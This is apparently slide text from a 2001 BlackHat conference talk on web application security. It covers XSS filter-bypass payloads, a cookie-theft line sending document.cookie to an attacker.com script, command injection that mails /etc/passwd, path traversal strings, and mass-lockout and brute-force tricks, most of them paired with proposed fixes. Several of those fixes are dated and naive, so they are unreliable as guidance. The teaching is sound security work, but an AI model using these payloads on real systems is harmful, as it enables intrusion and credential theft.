Web Application Security: The Land that Information Security Forgot

BlackHat Amsterdam 2001

Web Application SecurityThe Land that Information Security Forgot.

Presenter: Jeremiah Grossman

Copyright 2001 WhiteHat Security All Rights Reserved

Topics

Web Application Security Landscape

Common Web Application Security Mistakes

Web Application Attack Methodologies

2001 © WhiteHat Security, Inc.

Topics

Web Application Attack Methodologies

Information & DiscoveryInput Manipulation & Parameter Tampering

Cross-Site ScriptingSystem Mis-Configuration


But Why!?

• Easiest way to compromise hosts, networks and• users.• Widely deployed.• No Logs! (POST Request payload)• Incredibly hard to defend against or detect.• Most don’t think of locking down web

applications.• Intrusion Detection is a joke.• Firewall? What firewall? I don’t see no any

firewall.• Encrypted transport layer does nothing.• Best of all, no one is looking anyway.


How much easier can it get!?

Oh right.

Unicode


Web Application The Simple Definition

A web application or web service is asoftware application that is

accessibleusing a web browser or HTTP(s) useragent.


Web Security Layers


The Implementation

EntertainmentMessage BoardsWebMailGuest BooksVoting Polls

E-CommerceShoppingAuctionsBankingStock Trading

Just Plain CrazyPrintersPDA’s

Cell PhonesSystem

Configuration.NET/Passport


Firewall



Common Web Application Security Mistakes


Trusting Client-Side Data

DO NOT TRUST CLIENT-SIDE DATA!

Trusting Client-Side Data is #1 cause of vulnerabilities.

Identify all input parameters that trust client-side data.



The Level of TrustE-Commerce Shopping

Numbers<input type=hidden value=2149.37>

2149.00

Too much for a new VAIO!

<input type=hidden value=2.99> 2.99

Now On Sale!



The Level of TrustSearches/Queries/Templates

Pathhttp://foo.com/cgi?val=string&file=/html/

name.db

Or better yet…

http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd


Unescaped Special Characters

! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <

Check for:Unescaped special characters

within input strings


HTML Character Filtering

Proper handling of special characters

> => >< => <

" => "& => &

Null characters should all be removed. %00


More mistakes…

SUID (Does a web application really need root?)

Authentication mechanisms using technologies such

as JavaScript or ActiveX.

Lack of re-authenticating the user before issuing new

passwords or performing critical tasks.

Hosting of uncontrolled data on a protected domain.


Information & Discovery

Spidering/Site CrawlingIdentifiable CharacteristicsErrors and Response CodesFile/Application EnumerationNetwork Reconnaissance


Spidering/Site Crawling

Site MapService Map Documentation

Hidden ServicesCGI's and FormsEmail addresses

Tools: WGEThttp://www.gnu.org/software/wget/

wget.html


Identifiable Characteristics

Comment LinesURL ExtensionsMeta TagsCookiesClient-Side scripting languages

Enormous wealth of information about process flows, debug command, system types and

configurations.


Error and Response Codes

HTTP Response HeadersServer: IBM/Apache 1.3.19Cookie Characteristics

Error MessagesException Messages (Java / SQL)404 Error PagesFailed LoginLocked AccountDatabase or file non-existent


File/Application Enumeration

Commonly referred to as “forced browsing” or “CGI Scanning”.

Directory Browsing Index Listings

http://www.foo.com/dir3/dir2/dir1/file.html

Try:

http://www.foo.com/dir3/dir2/dir1/

http://www.foo.com/dir3/dir2/

http://www.foo.com/dir3/

Tools: Whisker

http://www.wiretrip.net/


File/Application Enumeration

Sample Files

Template Directories

Temp or Backup files

Hidden Files

Vulnerable CGIs


Network Reconnaissance

WHOIS

ARIN http://www.arin.net/whois/index.html

Port Scan (Nmap)http://www.insecure.org/nmap/index.html

Traceroute

Ping Scan (Nmap or HPING) http://www.hping.org/

NSLookup/ Reverse DNS

DNS Zone Transfer (DIG)

OS Finger Printing (Nmap or Xprobe)


Input Manipulation Parameter Tampering"Twiddling Bits."

Cross-Site Scripting

Filter-Bypass Manipulation

OS Commands

Meta Characters

Path/Directory Traversal

Hidden Form Field Manipulation

HTTP Headers


Cross-Site ScriptingBad name given to a dangerous security

issue

Attack targets the user of the system rather

than the system itself.

Outside client-side languages executing within

the users web environment with the same

level of privilege as the hosted site.


Client-Side Scripting Languages

DHTML (HTML, XHTML, HTML x.0)Opens all the doors.

JavaScript (1.x) Browser/DOM ManipulationJava (Applets)Malicious AppletsVBScript Browser/DOM ManipulationFlash Dangerous Third-Party

InteractivityActiveX Let me count the ways…XML/XSL Another Door OpenerCSS Browser/DOM Manipulation


Accessing the DOM & Outside the DOM

Document Object Model (DOM)

Client-Side languages possess an enormous amount of power to

access and manipulate the DOM within a browser.

Complex & diverse interconnections create an increased the level of

access within the DOM.

Increased level of access to read & modify DOM data ranging

anything from background colors, to a file on your systems, and

beyond to executing systems calls.


Authentication/Authorization “Hand in the cookie jar.”

Cookies are restricted to domains (.acme.com)Uncontrolled data on a restricted domain can accessthe cookie data.

JavaScript Expression: "document.cookie"window.opendocument.img.srcHidden Form Submit

www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA

Cookie data is passed to a CGI through a GET request to a off

domain host.


The Scenarios

Trick a user to re-login to a spoofed page

Compromise authentication credentials

Load dangerous of maliscious ActiveX

Re-Direct a user or ALL users

Crash the machine or the browser


CSS Danger“The Remote Launch Pad.”

Successfully CSS a user via a protected domain.

Utilizing a Client-Side utility (JavaScript, ActiveX,VBScript, etc.), exploit a browser hole to downloada trojan/virus.

User is unknowingly infected/compromised withina single HTTP page load.

ActiveX Netcat Anyone?


Dangerous HTML“HTML Bad”

<APPLET> Malicious Java Applications<BODY> Altering HTML Page Characteristics<EMBED> Embedding Third-Party Applications (Flash, etc.)<FRAME> Directly calling in other uncontrolled HTML<FRAMESET> Directly calling in other uncontrolled HTML<HTML> Altering HTML Page Characteristics<IFRAME> Directly calling in other uncontrolled HTML<IMG> SCRing Protocol attacks and other abuses<LAYER> Directly calling in other uncontrolled HTML<ILAYER> Directly calling in other uncontrolled HTML<META> META Refreshes. (Client-Redirects)<OBJECT> ActiveX (Nuff Said)<SCRIPT> JavaScript/VBScript Loading<STYLE> Style Sheet and Scripting Alterations


Dangerous Attributes“Attributes Bad”

ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes)

STYLESRC

HREFTYPE


Filter Bypassing"JavaScript is a Cockroach"

There are all kinds of input filters web applicationsimplement to sanitize data.

This section will demonstrate many known ways inputfilter's can be bypassed to perform malicious functionssuch as, cross-scripting, browser-hijacking, cookie theft,and others.

Client-Side Scripting (CSS) attacks require the executionof either, JavaScript, Java, VBScript, ActiveX, Flash andsome others.

We will be assuming that these web applications acceptHTML, at least in a limited sense.


Testing the Filters

Submit all the raw HTML tags you can find, and then

view the output results.

Combine HTML with tag attributes, such as SRC,

STYLE, HREF and OnXXX (JavaScript EventHandler).

This will show what HTML is allowed, what thechanges were, and possible what dangerous

HTMLcan be exploited.


SCRIPT TAG

Description: The script tag is the simplest form of inputting JavaScript

Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>

Solution: replace all "script" tags.


SRCing JavaScript Protocol

Description: The JavaScript protocol will execute theexpression entered after the colon. Netscape Tested.

Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');">

Solution: Replace "javascript" strings in all SRC & HREFattributes in HTML tags with another string.

Exp: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.

Further Information:Any HTML tag with a SRC attribute will execute this script onpage load or on link activation.

As a further protocol pattern matching, keywords "livescript" and "mocha" must be

also replaced for the hold the same possibilities.

*** Netscape code names ***2001 © WhiteHat Security, Inc.

SRCing JavaScript Protocol w/ HTML Entities

Description: As another derivative of the previous, Decimal HTML entities within these

strings can cause filter bypass.

Exploit: <IMG SRC="javasc ript:alert('JavaScript Executed');">Replacement of entities \10 - \11 - \12 - \13 will also succeed.

Hex instead of Decimal HTML entities will also bypass input filters and execute.

<IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');">

As well as placing multiple ZERO's in front.<IMG SRC=javasc
ript:alert('JavaScript Executed');>

Solution:Filter these entities within the string then do your further pattern matching


AND CURLY

Description:Obscure Netscape JavaScript execution line. Exact

syntax isneeded to execute.

Exploit: <IMG SRC="&{alert('JavaScript Executed')};">

Solution:<IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem.


Style Tag Conversion

Description: Turn a style tag into a JavaScript expression.

Exploit: <style TYPE="text/javascript">JS EXPRESSION</style>

Solution: Replace the "javascript" string with "java_script" and all should be fine.

Exploit: Import dangerous CSS.<STYLE type=text/css>@import url(http://server/very_bad.css);</STYLE>

Solution: Filter and replace the "@import“

Exploit: Import a JavaScript Expression through a style tag.<style TYPE="text/css">@import url(javascript:alert('JavaScript Executed')); IE HOLE</style>

Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe. 2001 © WhiteHat Security, Inc.

Using CSS

Click to ExecuteUser must click on a link to execute the script.(Search Fields, 404 Errors, etc.)

http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>

Mass InjectionAll user viewing the page execute the script.(Guest Books, Message Boards)

Post a JavaScript onto a board

Message <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>


Using CSS

Directed InjectionSoon as user load the page, script executes.(WebMail, HTML Mail, Messaging)

Send an email with…HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>

Holding the door open(FeedBack, Profiles Pages, anything persistent…)

Load HTML Page with sourced scripts.

<LAYER SRC=“javascript.js”></LAYER>


Twiddling Bits

OS CommandsMeta CharactersPath/Directory Traversal


Power of the Semi-Colonpiping input to the command line.

OS Commandshttp://foo.com/[email protected]

Append:http://foo.com/[email protected];+sendmail+/etc/

passwd

Piping:http://foo.com/[email protected]+|+less

Re-Direct:http://foo.com/[email protected]+>+/


Power of Special Characterspiping input to the command line.

Meta Charactershttp://foo.com/app.cgi?list=file.txt

Altered:http://foo.com/app.cgi?list=*


Power of the Dots and Slashespiping input to the command line.

Path Directory Traversalhttp://foo.com/app.cgi?directory=/path/to/data

DotDot Slash:http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd

Dot Slash:http://foo.com/app.cgi?dir=path/to/data../../../../etc/././

passwd

Double DotDot Slash:http://foo.com/app.cgi?dir=path/to/data....//….//….//etc/

passwd2001 © WhiteHat Security, Inc.

More Filter Bypassing

Method Alteration (HEAD, PUT, POST, GET, ect.)

URL Encode

http://www.foo.com/cgi?value=%46%72%68%86

Null Characters

http://www.foo.com/cgi?value=file%00.html

More…

Alternate Case, Unicode, String Length, Multi-Slash, etc.


More bits…

Hidden Form Field Manipulation

HTTP Headers (Cookies, Referers…)


System Mis-Configurations“patches, patches, and more patches…"

Vendor PatchesDefault Accounts

Check:Web Server permission by directory browsingSoftware version from DiscoveryKnown default accounts in commercial

platformsBugTraqAnonymous FTP open on Web Server


Other Dirty Tricks“Abuse can be far more time consuming, costly and

dangerous”

Mass Account LockoutAttacks against brute force

3 Time Failure Lock-Out Rule

Purposely fail the 3 attempts again thousands of accounts. If the login is

sequential, even better.


Other Dirty Tricks“Abuse can be far more time consuming, costly and

dangerous”

Brute Force/Page SequencingAttacks against process flow

Use 1 0r 2 pieces of data to get the rest.

Slowly brute force the process for dataaggregation.


Thank YouBlackHat and Attendees

Questions?

Jeremiah [email protected]

WhiteHat SecurityAll presentation updates will be available on

www.whitehatsec.com


Technology

Web Application Security: The Land that Information Security Forgot